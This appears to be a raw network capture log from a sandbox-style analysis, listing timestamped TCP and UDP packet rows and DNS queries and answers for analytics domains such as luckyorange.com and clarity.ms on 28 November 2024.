                                                        Nov 28, 2024 13:35:46.791058064 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:46.791084051 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:46.794070959 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:46.794076920 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:46.794193029 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:46.794198036 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:46.902698040 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:46.905514002 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:46.905529976 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:46.919953108 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:46.922282934 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:46.944782019 CET4434988635.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:46.944916010 CET4434988635.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:46.945086956 CET49886443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:46.945779085 CET49886443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:46.945789099 CET4434988635.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:46.963365078 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:47.113290071 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:47.117594004 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:47.117619991 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:47.214049101 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:47.222594976 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:47.222608089 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:47.225256920 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:47.267338037 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:47.333354950 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:47.380440950 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:47.380454063 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:47.383981943 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:47.383992910 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:47.384063005 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:47.384067059 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:47.543893099 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:47.546926022 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:47.546957970 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:47.578597069 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:47.581636906 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:47.581650972 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:47.584045887 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:47.631333113 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:47.788774967 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:47.791533947 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:47.791564941 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:47.956314087 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:47.959592104 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:47.959789038 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:47.959800005 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:47.961333036 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:47.961349964 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:47.962363958 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:47.962388039 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:47.962814093 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:47.962835073 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:48.053581953 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:48.056199074 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:48.056226015 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:48.069345951 CET49890443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:48.069381952 CET4434989035.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:48.069438934 CET49890443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:48.069657087 CET49890443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:48.069669962 CET4434989035.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:48.190970898 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:48.197596073 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:48.197626114 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:48.412368059 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:48.414889097 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:48.414904118 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:48.415723085 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:48.459867001 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:48.459875107 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:48.462757111 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:48.462811947 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:48.462826014 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:48.561588049 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:48.564712048 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:48.607335091 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:48.627000093 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:48.631042004 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:48.631052017 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:48.813661098 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:48.817027092 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:48.817039013 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:48.874914885 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:48.915224075 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:48.915232897 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:48.927079916 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:48.927089930 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:48.928066015 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:48.928071022 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:49.052829027 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:49.052907944 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:49.055840015 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:49.055844069 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:49.056251049 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:49.056256056 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:49.263263941 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:49.265880108 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:49.265892982 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:49.281294107 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:49.284420013 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:49.284435987 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:49.291443110 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:49.291841984 CET4434989035.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:49.294234037 CET49890443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:49.294250011 CET4434989035.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:49.294615984 CET4434989035.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:49.298134089 CET49890443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:49.298197985 CET4434989035.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:49.298496962 CET49890443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:49.339330912 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:49.343319893 CET4434989035.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:49.349632025 CET49890443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:49.400329113 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:49.444202900 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:49.444214106 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:49.447876930 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:49.447886944 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:49.448642969 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:49.448647022 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:49.610620975 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:49.616945982 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:49.616956949 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:49.722470045 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:49.729258060 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:49.729283094 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:49.731558084 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:49.756000042 CET4434989035.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:49.756211996 CET4434989035.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:49.756314039 CET49890443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:49.756443977 CET49890443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:49.756464958 CET4434989035.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:49.775336027 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:49.889797926 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:49.892986059 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:49.893004894 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:49.898607016 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:49.939343929 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:50.100265980 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:50.103513956 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:50.103542089 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:50.138561010 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:50.193104982 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:50.193116903 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:50.196094990 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:50.196160078 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:50.196190119 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:50.259601116 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:50.259680033 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:50.261842966 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:50.261928082 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:50.261949062 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:50.469873905 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:50.477988005 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:50.519342899 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:50.560108900 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:50.600083113 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:50.600091934 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:50.603004932 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:50.603014946 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:50.603185892 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:50.603189945 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:50.721596003 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:50.728317022 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:50.728329897 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:50.730587959 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:50.775324106 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:50.931930065 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:50.934540987 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:50.934556961 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:50.964039087 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:50.966239929 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:50.966254950 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:50.968329906 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:51.011336088 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:51.083513975 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:51.130712032 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:51.130728006 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:51.134277105 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:51.134288073 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:51.134385109 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:51.134388924 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:51.294147968 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:51.296730995 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:51.296746969 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:51.396662951 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:51.399144888 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:51.399159908 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:51.401048899 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:51.447325945 CET4434986013.107.246.63192.168.2.4
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Nov 28, 2024 13:34:28.949846983 CET53547951.1.1.1192.168.2.4
                                                        Nov 28, 2024 13:34:29.011822939 CET53606191.1.1.1192.168.2.4
                                                        Nov 28, 2024 13:34:31.900795937 CET53646581.1.1.1192.168.2.4
                                                        Nov 28, 2024 13:34:32.939277887 CET5771753192.168.2.41.1.1.1
                                                        Nov 28, 2024 13:34:32.939399958 CET5797553192.168.2.41.1.1.1
                                                        Nov 28, 2024 13:34:33.082818985 CET53577171.1.1.1192.168.2.4
                                                        Nov 28, 2024 13:34:33.082870007 CET53579751.1.1.1192.168.2.4
                                                        Nov 28, 2024 13:34:40.616492987 CET5772053192.168.2.41.1.1.1
                                                        Nov 28, 2024 13:34:40.616621017 CET5312453192.168.2.41.1.1.1
                                                        Nov 28, 2024 13:34:40.755403042 CET53648901.1.1.1192.168.2.4
                                                        Nov 28, 2024 13:34:40.757422924 CET53577201.1.1.1192.168.2.4
                                                        Nov 28, 2024 13:34:40.757500887 CET53531241.1.1.1192.168.2.4
                                                        Nov 28, 2024 13:34:43.733419895 CET5242353192.168.2.41.1.1.1
                                                        Nov 28, 2024 13:34:43.733865976 CET5432953192.168.2.41.1.1.1
                                                        Nov 28, 2024 13:34:43.779119015 CET6259953192.168.2.41.1.1.1
                                                        Nov 28, 2024 13:34:43.779310942 CET6445753192.168.2.41.1.1.1
                                                        Nov 28, 2024 13:34:43.783478975 CET5695153192.168.2.41.1.1.1
                                                        Nov 28, 2024 13:34:43.783653021 CET5134953192.168.2.41.1.1.1
                                                        Nov 28, 2024 13:34:43.862303019 CET6281253192.168.2.41.1.1.1
                                                        Nov 28, 2024 13:34:43.862703085 CET5796153192.168.2.41.1.1.1
                                                        Nov 28, 2024 13:34:43.898191929 CET53529181.1.1.1192.168.2.4
                                                        Nov 28, 2024 13:34:43.931623936 CET53569511.1.1.1192.168.2.4
                                                        Nov 28, 2024 13:34:43.933028936 CET53513491.1.1.1192.168.2.4
                                                        Nov 28, 2024 13:34:43.933363914 CET53625991.1.1.1192.168.2.4
                                                        Nov 28, 2024 13:34:43.936785936 CET53644571.1.1.1192.168.2.4
                                                        Nov 28, 2024 13:34:44.009943008 CET53628121.1.1.1192.168.2.4
                                                        Nov 28, 2024 13:34:44.010229111 CET53579611.1.1.1192.168.2.4
                                                        Nov 28, 2024 13:34:46.222037077 CET53647361.1.1.1192.168.2.4
                                                        Nov 28, 2024 13:34:46.437884092 CET5109153192.168.2.41.1.1.1
                                                        Nov 28, 2024 13:34:46.438013077 CET5631453192.168.2.41.1.1.1
                                                        Nov 28, 2024 13:34:46.759119034 CET138138192.168.2.4192.168.2.255
                                                        Nov 28, 2024 13:34:47.176107883 CET6416953192.168.2.41.1.1.1
                                                        Nov 28, 2024 13:34:47.176264048 CET5516853192.168.2.41.1.1.1
                                                        Nov 28, 2024 13:34:47.319653034 CET53551681.1.1.1192.168.2.4
                                                        Nov 28, 2024 13:34:47.319818974 CET53641691.1.1.1192.168.2.4
                                                        Nov 28, 2024 13:34:48.944314957 CET53575841.1.1.1192.168.2.4
                                                        Nov 28, 2024 13:34:52.465008020 CET6338753192.168.2.41.1.1.1
                                                        Nov 28, 2024 13:34:52.465162992 CET6542353192.168.2.41.1.1.1
                                                        Nov 28, 2024 13:34:52.605367899 CET53633871.1.1.1192.168.2.4
                                                        Nov 28, 2024 13:34:52.606591940 CET53654231.1.1.1192.168.2.4
                                                        Nov 28, 2024 13:34:55.181052923 CET6108253192.168.2.41.1.1.1
                                                        Nov 28, 2024 13:34:55.181229115 CET5821553192.168.2.41.1.1.1
                                                        Nov 28, 2024 13:34:55.320950985 CET53582151.1.1.1192.168.2.4
                                                        Nov 28, 2024 13:34:55.755036116 CET6058953192.168.2.41.1.1.1
                                                        Nov 28, 2024 13:34:55.755177975 CET5093653192.168.2.41.1.1.1
                                                        Nov 28, 2024 13:34:55.764620066 CET5837153192.168.2.41.1.1.1
                                                        Nov 28, 2024 13:34:55.764784098 CET6126653192.168.2.41.1.1.1
                                                        Nov 28, 2024 13:34:55.896987915 CET53509361.1.1.1192.168.2.4
                                                        Nov 28, 2024 13:34:55.897006989 CET53605891.1.1.1192.168.2.4
                                                        Nov 28, 2024 13:34:55.907697916 CET53583711.1.1.1192.168.2.4
                                                        Nov 28, 2024 13:34:55.908520937 CET53612661.1.1.1192.168.2.4
                                                        Nov 28, 2024 13:34:57.640872955 CET4981453192.168.2.41.1.1.1
                                                        Nov 28, 2024 13:34:57.641151905 CET5498953192.168.2.41.1.1.1
                                                        Nov 28, 2024 13:34:57.877222061 CET53498141.1.1.1192.168.2.4
                                                        Nov 28, 2024 13:34:57.877266884 CET53549891.1.1.1192.168.2.4
                                                        Nov 28, 2024 13:35:01.477530003 CET6114453192.168.2.41.1.1.1
                                                        Nov 28, 2024 13:35:01.477706909 CET4959253192.168.2.41.1.1.1
                                                        Nov 28, 2024 13:35:01.615288019 CET53611441.1.1.1192.168.2.4
                                                        Nov 28, 2024 13:35:01.617528915 CET53616831.1.1.1192.168.2.4
                                                        Nov 28, 2024 13:35:01.619293928 CET53495921.1.1.1192.168.2.4
                                                        Nov 28, 2024 13:35:07.772825003 CET53500801.1.1.1192.168.2.4
                                                        Nov 28, 2024 13:35:07.893240929 CET53548191.1.1.1192.168.2.4
                                                        Nov 28, 2024 13:35:28.352706909 CET53564591.1.1.1192.168.2.4
                                                        Nov 28, 2024 13:35:30.475332022 CET53552951.1.1.1192.168.2.4
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Nov 28, 2024 13:34:32.939277887 CET192.168.2.41.1.1.10x820bStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                        Nov 28, 2024 13:34:32.939399958 CET192.168.2.41.1.1.10xdebeStandard query (0)www.google.com65IN (0x0001)false
                                                        Nov 28, 2024 13:34:40.616492987 CET192.168.2.41.1.1.10x3b11Standard query (0)tools.luckyorange.comA (IP address)IN (0x0001)false
                                                        Nov 28, 2024 13:34:40.616621017 CET192.168.2.41.1.1.10x2635Standard query (0)tools.luckyorange.com65IN (0x0001)false
                                                        Nov 28, 2024 13:34:43.733419895 CET192.168.2.41.1.1.10x84daStandard query (0)www.clarity.msA (IP address)IN (0x0001)false
                                                        Nov 28, 2024 13:34:43.733865976 CET192.168.2.41.1.1.10x5b92Standard query (0)www.clarity.ms65IN (0x0001)false
                                                        Nov 28, 2024 13:34:43.779119015 CET192.168.2.41.1.1.10x58d1Standard query (0)userstatics.comA (IP address)IN (0x0001)false
                                                        Nov 28, 2024 13:34:43.779310942 CET192.168.2.41.1.1.10x3132Standard query (0)userstatics.com65IN (0x0001)false
                                                        Nov 28, 2024 13:34:43.783478975 CET192.168.2.41.1.1.10xad58Standard query (0)settings.luckyorange.comA (IP address)IN (0x0001)false
                                                        Nov 28, 2024 13:34:43.783653021 CET192.168.2.41.1.1.10x52b0Standard query (0)settings.luckyorange.com65IN (0x0001)false
                                                        Nov 28, 2024 13:34:43.862303019 CET192.168.2.41.1.1.10xf50bStandard query (0)tools.luckyorange.comA (IP address)IN (0x0001)false
                                                        Nov 28, 2024 13:34:43.862703085 CET192.168.2.41.1.1.10x68baStandard query (0)tools.luckyorange.com65IN (0x0001)false
                                                        Nov 28, 2024 13:34:46.437884092 CET192.168.2.41.1.1.10xd3ecStandard query (0)www.clarity.msA (IP address)IN (0x0001)false
                                                        Nov 28, 2024 13:34:46.438013077 CET192.168.2.41.1.1.10xd1bcStandard query (0)www.clarity.ms65IN (0x0001)false
                                                        Nov 28, 2024 13:34:47.176107883 CET192.168.2.41.1.1.10x782Standard query (0)userstatics.comA (IP address)IN (0x0001)false
                                                        Nov 28, 2024 13:34:47.176264048 CET192.168.2.41.1.1.10x5d25Standard query (0)userstatics.com65IN (0x0001)false
                                                        Nov 28, 2024 13:34:52.465008020 CET192.168.2.41.1.1.10x8b67Standard query (0)settings.luckyorange.comA (IP address)IN (0x0001)false
                                                        Nov 28, 2024 13:34:52.465162992 CET192.168.2.41.1.1.10xbdbaStandard query (0)settings.luckyorange.com65IN (0x0001)false
                                                        Nov 28, 2024 13:34:55.181052923 CET192.168.2.41.1.1.10x84dStandard query (0)o.clarity.msA (IP address)IN (0x0001)false
                                                        Nov 28, 2024 13:34:55.181229115 CET192.168.2.41.1.1.10xd3b4Standard query (0)o.clarity.ms65IN (0x0001)false
                                                        Nov 28, 2024 13:34:55.755036116 CET192.168.2.41.1.1.10x5ad2Standard query (0)in.visitors.liveA (IP address)IN (0x0001)false
                                                        Nov 28, 2024 13:34:55.755177975 CET192.168.2.41.1.1.10x76a3Standard query (0)in.visitors.live65IN (0x0001)false
                                                        Nov 28, 2024 13:34:55.764620066 CET192.168.2.41.1.1.10x524bStandard query (0)realtime.luckyorange.comA (IP address)IN (0x0001)false
                                                        Nov 28, 2024 13:34:55.764784098 CET192.168.2.41.1.1.10x876aStandard query (0)realtime.luckyorange.com65IN (0x0001)false
                                                        Nov 28, 2024 13:34:57.640872955 CET192.168.2.41.1.1.10x1704Standard query (0)api-preview.luckyorange.comA (IP address)IN (0x0001)false
                                                        Nov 28, 2024 13:34:57.641151905 CET192.168.2.41.1.1.10xd05aStandard query (0)api-preview.luckyorange.com65IN (0x0001)false
                                                        Nov 28, 2024 13:35:01.477530003 CET192.168.2.41.1.1.10x10Standard query (0)api-preview.luckyorange.comA (IP address)IN (0x0001)false
                                                        Nov 28, 2024 13:35:01.477706909 CET192.168.2.41.1.1.10x6eeaStandard query (0)api-preview.luckyorange.com65IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Nov 28, 2024 13:34:33.082818985 CET1.1.1.1192.168.2.40x820bNo error (0)www.google.com142.250.181.68A (IP address)IN (0x0001)false
                                                        Nov 28, 2024 13:34:33.082870007 CET1.1.1.1192.168.2.40xdebeNo error (0)www.google.com65IN (0x0001)false
                                                        Nov 28, 2024 13:34:40.757422924 CET1.1.1.1192.168.2.40x3b11No error (0)tools.luckyorange.comd20519brkbo4nz.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 28, 2024 13:34:40.757422924 CET1.1.1.1192.168.2.40x3b11No error (0)d20519brkbo4nz.cloudfront.net108.158.75.10A (IP address)IN (0x0001)false
                                                        Nov 28, 2024 13:34:40.757422924 CET1.1.1.1192.168.2.40x3b11No error (0)d20519brkbo4nz.cloudfront.net108.158.75.68A (IP address)IN (0x0001)false
                                                        Nov 28, 2024 13:34:40.757422924 CET1.1.1.1192.168.2.40x3b11No error (0)d20519brkbo4nz.cloudfront.net108.158.75.30A (IP address)IN (0x0001)false
                                                        Nov 28, 2024 13:34:40.757422924 CET1.1.1.1192.168.2.40x3b11No error (0)d20519brkbo4nz.cloudfront.net108.158.75.103A (IP address)IN (0x0001)false
                                                        Nov 28, 2024 13:34:40.757500887 CET1.1.1.1192.168.2.40x2635No error (0)tools.luckyorange.comd20519brkbo4nz.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 28, 2024 13:34:43.874726057 CET1.1.1.1192.168.2.40x84daNo error (0)www.clarity.msclarity.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 28, 2024 13:34:43.874726057 CET1.1.1.1192.168.2.40x84daNo error (0)clarity.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 28, 2024 13:34:43.874726057 CET1.1.1.1192.168.2.40x84daNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 28, 2024 13:34:43.874726057 CET1.1.1.1192.168.2.40x84daNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                        Nov 28, 2024 13:34:43.875735044 CET1.1.1.1192.168.2.40x5b92No error (0)www.clarity.msclarity.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 28, 2024 13:34:43.875735044 CET1.1.1.1192.168.2.40x5b92No error (0)clarity.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 28, 2024 13:34:43.931623936 CET1.1.1.1192.168.2.40xad58No error (0)settings.luckyorange.com34.107.203.234A (IP address)IN (0x0001)false
                                                        Nov 28, 2024 13:34:43.933363914 CET1.1.1.1192.168.2.40x58d1No error (0)userstatics.com172.67.208.186A (IP address)IN (0x0001)false
                                                        Nov 28, 2024 13:34:43.933363914 CET1.1.1.1192.168.2.40x58d1No error (0)userstatics.com104.21.53.38A (IP address)IN (0x0001)false
                                                        Nov 28, 2024 13:34:43.936785936 CET1.1.1.1192.168.2.40x3132No error (0)userstatics.com65IN (0x0001)false
                                                        Nov 28, 2024 13:34:44.009943008 CET1.1.1.1192.168.2.40xf50bNo error (0)tools.luckyorange.comd20519brkbo4nz.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 28, 2024 13:34:44.009943008 CET1.1.1.1192.168.2.40xf50bNo error (0)d20519brkbo4nz.cloudfront.net108.158.75.10A (IP address)IN (0x0001)false
                                                        Nov 28, 2024 13:34:44.009943008 CET1.1.1.1192.168.2.40xf50bNo error (0)d20519brkbo4nz.cloudfront.net108.158.75.68A (IP address)IN (0x0001)false
